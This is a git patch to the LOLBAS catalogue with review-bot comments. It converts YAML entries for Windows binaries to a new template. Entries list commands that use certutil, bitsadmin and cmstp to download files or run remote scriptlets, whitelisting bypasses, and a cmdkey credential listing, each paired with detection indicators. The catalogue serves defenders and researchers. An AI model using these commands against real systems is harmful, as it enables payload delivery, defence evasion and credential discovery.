From adafa6de3f98d21801a69bcf66665b9bb82e3760 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Sep 2018 01:50:14 +0200 Subject: [PATCH] Update readme, began updating OSBins with new template --- README.md | 55 ++++++------ yml/{ => LOLUtilz}/OtherBinaries/AcroRd32.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Gpup.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Nlnotes.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Notes.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Nvudisp.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Nvuhda6.yml | 0 .../OtherBinaries/ROCCAT_Swarm.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Setup.yml | 0 yml/{ => LOLUtilz}/OtherBinaries/Usbinst.yml | 0 .../OtherBinaries/VBoxDrvInst.yml | 0 yml/OSBinaries/Atbroker.yml | 33 +++++--- yml/OSBinaries/Bash.yml | 38 ++++++--- yml/OSBinaries/Bitsadmin.yml | 83 ++++++++++++------- yml/OSBinaries/Certutil.yml | 63 ++++++++++---- yml/OSBinaries/Cmdkey.yml | 34 +++++--- yml/OSBinaries/Cmstp.yml | 49 +++++++---- 17 files changed, 234 insertions(+), 121 deletions(-) rename yml/{ => LOLUtilz}/OtherBinaries/AcroRd32.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Gpup.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Nlnotes.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Notes.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Nvudisp.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Nvuhda6.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/ROCCAT_Swarm.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Setup.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/Usbinst.yml (100%) rename yml/{ => LOLUtilz}/OtherBinaries/VBoxDrvInst.yml (100%) diff --git a/README.md b/README.md index 69a808a..7c76813 100644 --- a/README.md +++ b/README.md 
@@ -17,9 +17,10 @@ Primarily files that offer "extra" functionality. ## Definition -* Must be a Microsoft signed file. (OS or downloaded from Microsoft site) +* Must be a Microsoft signed file. (Native to the OS or downloaded from Microsoft site) * Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for) * Exceptions are Application Whitelisting bypasses +* Primary focus is stuff that can be leveraged by APT or in Red Teaming * Functionality can include: * Executing code @@ -48,14 +49,15 @@ We generate the MD files from this and later it will also be the base for an upc ## STORY -"Living off the land" was coined by Matt Graeber - @mattifestation <3 -One of the first "Living Off The Land" talks (That I know of) is this one: +"Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation) +One of the first "Living Off The Land" talks is this one: https://www.youtube.com/watch?v=j-r6UonEkUw -The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here: +The term LOLBins came from a twitter discussion on what to call these binaries that can be used by an attacker to perform other actions than what the binary was designed to do. +LOLBins was first proposed by Philip Goh (@MathCasualty) here: https://twitter.com/MathCasualty/status/969174982579273728 -The term LOLScripts came from Jimmy - @bohops: +The term LOLScripts came from Jimmy (@bohops): https://twitter.com/bohops/status/984828803120881665 Common hashtags for these files are: 
@@ -71,7 +73,7 @@ A "highly scientific poll" was also conducted to agree (69% yes) on the name LOL https://twitter.com/Oddvarmoe/status/985432848961343488 The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you) - +The domain http://lolbas-project.com has been registered by Jimmy (@bohops). (Thanks!) The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! Love this logo: 
@@ -82,33 +84,36 @@ Love this logo: All features are added to the issues in this repo. ### 1.0 -* Hosted https://github.com/api0cradle/LOLBAS/ -* Only MD files +- [x] Hosted https://github.com/api0cradle/LOLBAS/ +- [x] Only MD files ### 2.0 -- Current -* Hosted here on this repo -* Everything converted to YML files -* MD files generated from YML files -* Clearer definition -* Management scripts - +- [x] Moved from api0cradle and hosted here on this repo (https://github.com/LOLBAS-Project/LOLBAS) +- [x] Everything converted to YML files +- [x] MD files generated from YML files +- [x] Clearer definition of a LOLBin +- [ ] Management scripts +- [x] New template + ### 2.1 -* More categories -* Jekyll frontend -* Privileges required +- [ ] Migration to new template +- [ ] More categories - Part of the new template +- [ ] ATT&CK Mitre mapping +- [ ] Privileges required by binary +- [ ] Jekyll frontend + ### 2.2 -* ATT&CK Mitre mapping -* LOLBIN GUID - Unique ID for each bin -* Sub-Categories - * Signed executing unsigned - * Signed executing signed -* Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s ; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf +- [ ] LOLBIN GUID - Unique ID for each bin +- [ ]Sub-Categories + - [ ] Signed executing unsigned + - [ ] Signed executing signed + - [ ] Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s ; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf ### 2.3 -* Tests for PRs to ensure fields are valid -* Provide the project in DB format (sqlite) \ No newline at end of file +- [ ] Tests for PRs to ensure fields are valid +- [ ]Provide the project in DB format (sqlite) \ No newline at end of file diff --git a/yml/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml similarity index 100% rename from yml/OtherBinaries/AcroRd32.yml rename to yml/LOLUtilz/OtherBinaries/AcroRd32.yml 
diff --git a/yml/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml similarity index 100% rename from yml/OtherBinaries/Gpup.yml rename to yml/LOLUtilz/OtherBinaries/Gpup.yml diff --git a/yml/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml similarity index 100% rename from yml/OtherBinaries/Nlnotes.yml rename to yml/LOLUtilz/OtherBinaries/Nlnotes.yml diff --git a/yml/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml similarity index 100% rename from yml/OtherBinaries/Notes.yml rename to yml/LOLUtilz/OtherBinaries/Notes.yml diff --git a/yml/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml similarity index 100% rename from yml/OtherBinaries/Nvudisp.yml rename to yml/LOLUtilz/OtherBinaries/Nvudisp.yml diff --git a/yml/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml similarity index 100% rename from yml/OtherBinaries/Nvuhda6.yml rename to yml/LOLUtilz/OtherBinaries/Nvuhda6.yml diff --git a/yml/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml similarity index 100% rename from yml/OtherBinaries/ROCCAT_Swarm.yml rename to yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml diff --git a/yml/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml similarity index 100% rename from yml/OtherBinaries/Setup.yml rename to yml/LOLUtilz/OtherBinaries/Setup.yml diff --git a/yml/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml similarity index 100% rename from yml/OtherBinaries/Usbinst.yml rename to yml/LOLUtilz/OtherBinaries/Usbinst.yml diff --git a/yml/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml similarity index 100% rename from yml/OtherBinaries/VBoxDrvInst.yml rename to yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index af73012..6709551 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml 
@@ -1,20 +1,29 @@ --- Name: Atbroker.exe -Description: Execute -Author: '' +Description: Helper binary for Assistive Technology (AT) +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). + Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\Atbroker.exe - - C:\Windows\SysWOW64\Atbroker.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\Atbroker.exe + - path: C:\Windows\SysWOW64\Atbroker.exe +Code Sample: +- Code: +Detection: + - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration + - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs + - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ -Notes: > - Thanks to Adam - @hexacorn - Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. - + - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 9f61b57..8611056 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml 
@@ -1,17 +1,35 @@ --- Name: Bash.exe -Description: Execute -Author: '' +Description: File used by Windows subsystem for Linux +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: bash.exe -c calc.exe - Description: Execute calc.exe. + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used as a defensive evasion. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 + - Command: bash.exe -c calc.exe + Description: Executes calc.exe from bash.exe + Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 10 Full Path: - - '?' -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\bash.exe + - path: C:\Windows\SysWOW64\bash.exe +Code Sample: +- Code: +Detection: + - IOC: Child process from bash.exe Resources: - - '' -Notes: Thanks to ? - + - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +Acknowledgement: + - Person: Alex Ionescu + Handle: '@aionescu' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 61ef57d..637331a 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml 
@@ -1,36 +1,59 @@ --- -Name: Bitsadmin.exe -Description: Execute, Download, Copy, Read ADS -Author: '' +Name: bitsadmin.exe +Description: Used for managing background intelligent transfer +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: | - bitsadmin /create 1 - bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe - bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL - bitsadmin /RESUME 1 - bitsadmin /complete 1 - - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - - Command: | - bitsadmin /create 1 - bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe - bitsadmin /RESUME 1 - bitsadmin /complete 1 + - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 + Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. + Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. 
- - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset - Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. - - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset - Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset + Description: Command for copying cmd.exe to another folder + Usecase: Copy file + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset + Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. + Usecase: Execute binary file specified. Can be used as a defensive evasion. 
+ Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\Windows\System32\bitsadmin.exe - - c:\Windows\SysWOW64\bitsadmin.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\bitsadmin.exe + - path: C:\Windows\SysWOW64\bitsadmin.exe +Code Sample: +- Code: +Detection: + - IOC: Child process from bitsadmin.exe + - IOC: bitsadmin creates new files + - IOC: bitsadmin adds data to alternate data stream Resources: - - https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - - Slide 53 - - https://www.youtube.com/watch?v=_8xJaaQlpBo - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe - + - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 + - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Rob Fuller + Handle: '@mubix' + - Person: Chris Gates + Handle: '@carnal0wnage' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 9f88e41..daf8482 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml 
@@ -1,25 +1,56 @@ --- Name: Certutil.exe -Description: Download, Add ADS, Decode, Encode -Author: '' +Description: Windows binary used for handeling certificates +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe Description: Download and save 7zip to disk in the current folder. - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt Description: Download and save a PS1 file to an Alternate Data Stream (ADS). - - Command: | - certutil -encode inputFileName encodedOutputFileName - certutil -decode encodedInputFileName decodedOutputFileName - Description: Commands to encode and decode a file using Base64. + Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream + Category: Alternate data streams + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -encode inputFileName encodedOutputFileName + Description: Command to encode a file using Base64 + Usecase: Encode files to evade defensive measures + Category: Encode + Privileges: User + MitreID: T1027 + MitreLink: https://attack.mitre.org/wiki/Technique/T1027 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -decode encodedInputFileName decodedOutputFileName + Description: Command to decode a Base64 encoded file. 
+ Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\certutil.exe - - c:\windows\sysWOW64\certutil.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\certutil.exe + - path: C:\Windows\SysWOW64\certutil.exe +Code Sample: +- Code: +Detection: + - IOC: Certutil.exe creating new files on disk + - IOC: Useragent Microsoft-CryptoAPI/10.0 + - IOC: Useragent CertUtil URL Agent Resources: - - https://twitter.com/Moriarty_Meng/status/984380793383370752 - - https://twitter.com/mattifestation/status/620107926288515072 -Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 - + - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 + - Link: https://twitter.com/mattifestation/status/620107926288515072 +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Moriarty + Handle: '@moriarty2016' +--- diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index a87826d..045e72d 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml 
@@ -1,18 +1,28 @@ --- -Name: Cmdkey.exe -Description: Credentials -Author: '' +Name: Cmdkey.exe +Description: creates, lists, and deletes stored user names and passwords or credentials. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: cmdkey /list - Description: List cached credentials. + Description: List cached credentials + Usecase: Get credential information from host + Category: Credentials + Privileges: User + MitreID: T1078 + MitreLink: https://attack.mitre.org/wiki/Technique/T1078 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\cmdkey.exe - - c:\windows\sysWOW64\cmdkey.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\cmdkey.exe + - path: C:\Windows\SysWOW64\cmdkey.exe +Code Sample: +- Code: +Detection: + - IOC: Usage of this command could be and IOC Resources: - - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation -Notes: '' - + - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation + - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey +Acknowledgement: + - Person: + Handle: +--- \ No newline at end of file diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 014e7b2..895e235 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml 
@@ -1,26 +1,43 @@ --- Name: Cmstp.exe -Description: Execute, UACBypass -Author: '' +Description: Installs or removes a Connection Manager service profile. +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. + Category: Execute + Privileges: User + MitreID: T1191 + MitreLink: https://attack.mitre.org/wiki/Technique/T1191 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. + Usecase: Execute code hidden within an inf file. Execute code directly from Internet. 
+ Category: AwL bypass + Privileges: User + MitreID: T1191 + MitreLink: https://attack.mitre.org/wiki/Technique/T1191 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\system32\cmstp.exe - - C:\Windows\sysWOW64\cmstp.exe -Code Sample: [] -Detection: [] + - path: C:\Windows\System32\cmstp.exe + - path: C:\Windows\SysWOW64\cmstp.exe +Code Sample: +- Code: +Detection: + - IOC: Execution of cmstp.exe should not be normal unless VPN is in use + - IOC: Cmstp.exe communication towards internet and getting files Resources: - - https://twitter.com/NickTyrer/status/958450014111633408 - - https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 - - https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e - - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ - - https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 - (UAC Bypass) - - https://github.com/hfiref0x/UACME -Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer - + - Link: https://twitter.com/NickTyrer/status/958450014111633408 + - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 + - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e + - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ + - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 + - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' + - Person: Nick Tyrer + Handle: '@NickTyrer' +--- \ No newline at end of file
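Review bot: In the README roadmap hunk (`@@ -82,33 +84,36 @@`), two task-list items are missing the space after the checkbox, `- [ ]Sub-Categories` and `- [ ]Provide the project in DB format (sqlite)`, so GitHub will not render them as checkboxes; write `- [ ] Sub-Categories` and `- [ ] Provide the project in DB format (sqlite)`. The item "Split commands into command, argument structure, and example" is now indented under Sub-Categories although it is not a sub-category; move it back to the top level of 2.2. The file still ends with `\ No newline at end of file`; add the trailing newline while touching this section.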
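Review bot: In the yml/OSBinaries/Atbroker.yml hunk the Usecase line carries the typo `Assistibe` (copied over from the old Notes block) and should read `Assistive Technology (AT)`. `Code Sample:` followed by `- Code:` produces a list with a single null entry rather than an empty list; if the template means "no sample", use `Code Sample: []` or `- Code: ''`, and indent the item to match the two-space `  - IOC:` / `  - Link:` style used by the other lists. The file now ends with a bare `---` after the Acknowledgement block; a trailing `---` starts a second, empty YAML document, which single-document loaders (PyYAML's `safe_load`, for example) reject, so either drop it or close with `...`. The same trailing `---` appears in every OSBinaries file in this patch, so the MD generator should be checked against one of them before merging.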
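Review bot: In the yml/OSBinaries/Bash.yml hunk the two Commands entries are identical (`bash.exe -c calc.exe`, same Description, same MitreID) and differ only in Usecase and Category; if the template allows one Category per entry that is fine, but the Description should then say which scenario each covers, otherwise the generated MD will list the same command twice with no visible difference. `Windows subsystem for Linux` is a product name and should be `Windows Subsystem for Linux`. The Full Path list adds `C:\Windows\SysWOW64\bash.exe`; confirm on a Windows 10 host that a WOW64 copy actually exists before publishing the path, since the previous value was `'?'`.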
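Review bot: In the yml/OSBinaries/Bitsadmin.yml hunk the first two Commands were converted from `|` block scalars to single-line strings, which concatenates several separate commands with no separator (`bitsadmin /create 1 bitsadmin /addfile 1 ... bitsadmin /complete 1`); as written that is not a runnable command line. Either keep the block scalar or join the steps with `&` as the later one-liner entries already do. The second entry's Description still says "add cmd.exe to the job" although the command now fetches autoruns.exe from live.sysinternals.com; update it to match. The Copy entry reuses T1105, the same MitreID as the Download entry, for a purely local copy of cmd.exe; check whether that mapping is intended. `Name:` was lowercased to `bitsadmin.exe` while every other file in this patch keeps the capitalized form (`Certutil.exe`, `Cmdkey.exe`). The first Resources entry appends ` - slide 53` to the URL inside the Link field, which will break once Link is rendered as an href; move the slide reference out of the URL. `Windows vista` should be `Windows Vista` here and in the Certutil, Cmdkey and Cmstp hunks.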
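Review bot: In the yml/OSBinaries/Certutil.yml hunk, `handeling` in the Description should be `handling`. The Acknowledgement handle `'@moriarty2016'` does not match the Twitter account in the first Resources link (`Moriarty_Meng`); confirm which handle is correct before the MD is regenerated. This is the one file in the patch whose trailing `---` is followed by a newline, but the stray `---` itself has the same multi-document problem noted for Atbroker.yml.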
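Review bot: In the yml/OSBinaries/Cmdkey.yml hunk the Detection line `Usage of this command could be and IOC` has a typo (`an IOC`) and is too vague to act on; state what makes the usage suspicious, the way the Cmstp entry does ("should not be normal unless VPN is in use"). The Acknowledgement block has empty `Person:` and `Handle:` values, which load as null; other empty fields in these files use `''`, so either drop the block or write `Person: ''` / `Handle: ''`. The Description starts with lowercase `creates, lists, and deletes`; capitalize it to match the other files.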
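Review bot: In the yml/OSBinaries/Cmstp.yml hunk, `Category: AwL bypass` is spelled differently from Bash.yml's `AWL Bypass`; pick one form, since generated category pages will split on the difference. The old Description listed UACBypass and the `UACBypassCMSTP.ps1` resource is kept, but the `(UAC Bypass)` annotation was dropped and no Commands entry covers that usage, so the link now appears without context; restore the annotation or document the usage in an entry. The `hfiref0x/UACME` resource was removed without a note in the commit message saying why.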